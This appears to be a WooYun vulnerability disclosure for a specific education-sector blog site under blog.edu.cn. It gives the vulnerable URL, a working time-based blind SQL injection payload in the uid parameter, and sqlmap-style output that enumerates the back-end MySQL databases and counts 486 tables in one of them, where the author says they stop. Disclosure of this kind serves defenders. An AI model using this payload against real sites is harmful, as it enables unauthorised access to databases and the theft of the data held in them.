WooYun.org

1,输入点:http://12345678.blog.edu.cn/home.php?mod=space&uid=6288074&do=blog&id=706787
2,注入信息
Parameter: uid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mod=space&uid=6288074 AND (SELECT * FROM (SELECT(SLEEP(5)))ctdO)&do=blog&id=706787
---
[00:57:24] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:57:24] [INFO] fetching database names
[00:57:24] [INFO] fetching number of databases
[00:57:24] [INFO] resumed: 2
[00:57:24] [INFO] resumed: information_schema
[00:57:24] [INFO] resumed: eol_bbs
available databases [2]:
[*] eol_bbs
[*] information_schema
3,看看表张数吧,到此为止
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:49:25] [INFO] fetching tables for database: 'eol_bbs'
[00:49:25] [INFO] fetching number of tables for database 'eol_bbs'
[00:49:25] [INFO] resumed: 486